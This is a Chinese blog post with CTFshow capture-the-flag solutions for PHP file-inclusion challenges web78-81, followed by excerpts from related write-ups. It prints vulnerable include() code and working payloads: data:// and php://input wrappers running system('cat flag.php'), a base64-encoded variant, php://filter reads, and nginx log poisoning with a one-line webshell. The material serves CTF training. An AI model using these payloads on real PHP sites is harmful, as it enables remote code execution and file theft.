show web入门 文件包含 payload

已于 2022-06-17 00:50:15 修改
阅读量258 收藏
点赞数
文章标签: php 开发语言
于 2022-06-17 00:48:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53217892/article/details/125325550
版权

PHP 文件包含 漏洞 payload 安全防护
关键词由CSDN通过智能技术生成

web78

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

payload file=data://text/plain,<?php system('cat flag.php');?>

---------------------------------------------------------------------------------------------------------------------------------

web79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

payload   file=data://text/plain,<?=system('cat fla*');?>

file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

file=php://filter

--------------------------------------------------------------------------------------------------------------------------------

web80

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

可以用大写的PHP, input伪协议 

--------------------------------------------------------------------------------------------------------------------------------

web81

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

--------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------------------------------------

2h4ox1n9
关注
CTFshow 文件包含 web81
Kradress的博客
12-08 328
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 15:51:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(1)
2401_84297265的博客
04-28 880
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow-web80、81
m0_73590931的博客
08-11 482
然后,代码使用str_replace()函数对file变量进行两次替换操作。第一次替换将file中的php字符串替换为?,第二次替换将file中的data字符串替换为?首先,代码使用isset()函数检查是否存在名为'file'的GET参数。发现与刚刚一样都是user-agent,那还是在user-agent中插入一句话木马,后续做法与web80一样。最后,代码使用include()函数来包含$file变量所代表的文件。意思是将file中的:字符串替换为?看网页信息,发现是nginx服务器。
《CTFshow-Web入门》09. Web 81~90
学习学习学习......
09-01 1736
include() 利用,一句话木马之 Nginx 日志利用、条件竞争写入木马、file_put_contents() 利用,伪协议(php://filter/)、伪协议(data://)、PHP 特性之 intval()。
【CTFshow】文件包含web78-web81
weixin_51614272的博客
02-25 4804
文件包含web78-web81web78web79php://input伪协议data协议web80php://input伪协议日志包含绕过web81web82(没完全理解) web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的
ctfshow 日志包含Web80-81
m0_62584974的博客
04-16 6295
2022/4/16 题目过滤了php和data,我们这次要用日志文件包含 先抓包 nginx日志的默认路径为/var/log/nginx. ssh日志的默认路径为/var/log/auth.log SSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述 现在要将恶意代码写入日志文件 /?file=/var/log/nginx/access.log &
ctfshow web入门 命令执行payload
2h4ox1n9
06-15 1803
ctfshow web
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5706
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
CTFShow Web入门_爆破
qq_19533763的博客
04-01 1201
Web21 随便输入抓包 发现Base64加密 账号和密码用:隔开 使用BP构造payload爆破 下载官方提供的字典 把后缀名改为.zip即可打开 使用Custom iterator模式 第一部分 第二部分 第三部分使用字典 添加base64加密 关闭url编码 爆破完按length排序查看最小的回包 Web22 子域名爆破,爆破ctf.show 最终在vip.ctf.show的源码发现了flag Web23 error_reporting(0); include('fla
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1157
ctfshow-web入门-爆破wp
ctfshow web入门文件包含web78-81
m0_62207170的博客
04-16 191
ctfshow web入门文件包含web78-81
ctfshow 文件包含web78-web81)
m0_62274649的博客
12-16 262
这个题可以用日志包含来做,apache的日志一般是/var/log/apache/access.log。nginx的日志在/var/log/nginx/access.logstep1:把一句话木马加到U-A头里:
ctfshow web78-web81文件包含漏洞 wp
qq_56158055的博客
01-16 4247
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web78 啥都没过滤,直接用php伪协议查看flag.php 解码得出flag web79 通过替换函数,将php换成了???,可以换一个php的伪协议绕过,用data伪协议 web80 这里把data也给过滤了,所有换一个伪协议,用input伪协议 然后查看f10g.php就能得到flag web81 这下把:这过滤了,伪协议是用不...
ctfshow web80-88
weixin_58519918的博客
04-19 3744
web(80) 构建/?file=Php://input post: <?php system("tac fl0g.php")?>【php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。】 因为我在网上看大部分都使用burp来解决这个题目,然后我的burp他在虚拟机里面一直没有落实在本机
ctfshow-web入门-文件包含web78、web79、web80、web81)
Welcome To Myon'Blog !
07-04 1867
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?
CTFshow web 入门 web78------web81 文件包含wp
2202_75289892的博客
08-01 742
php代码?分析代码,repalce函数将输入值中的php替换成?,可见此处php被过滤。2.得到以上文件,可知我们需要访问flag.php文件。上一题的该方法无法得到flag,会被替换成?最后右键查看源代码,得到flag。文件包含类型,并且没有任何过滤。那么考虑对php代码进行编码。system()用法如上图。查看源代码得到flag。
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7412
个人ctfshow刷题记录
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2773
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
CTFshow_Web_文件包含——web78~88、116~117
Ho1aAs‘s Blog
04-26 1092
文章目录题解web78web79web80~81web82~86web87web88web116web117完 题解 LFI:Local File Include RFI:Remote File Include web78 php伪协议,使用php://filter,解码即可 [GET]PAYLOAD: ?file=php://filter/convert.base64-encode/resource=flag.php web79 过滤php,data伪协议,使用php://data,上传php代码打开f
文件包含漏洞payload
最新发布
08-21
文件包含漏洞,也称为“PHP Inclusion Vulnerability”或“Local File Inclusion (LFI)”,是一种常见的Web应用程序安全漏洞。攻击者利用这种漏洞,能够通过恶意输入将服务器上的文件路径注入到网站的脚本中,使得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值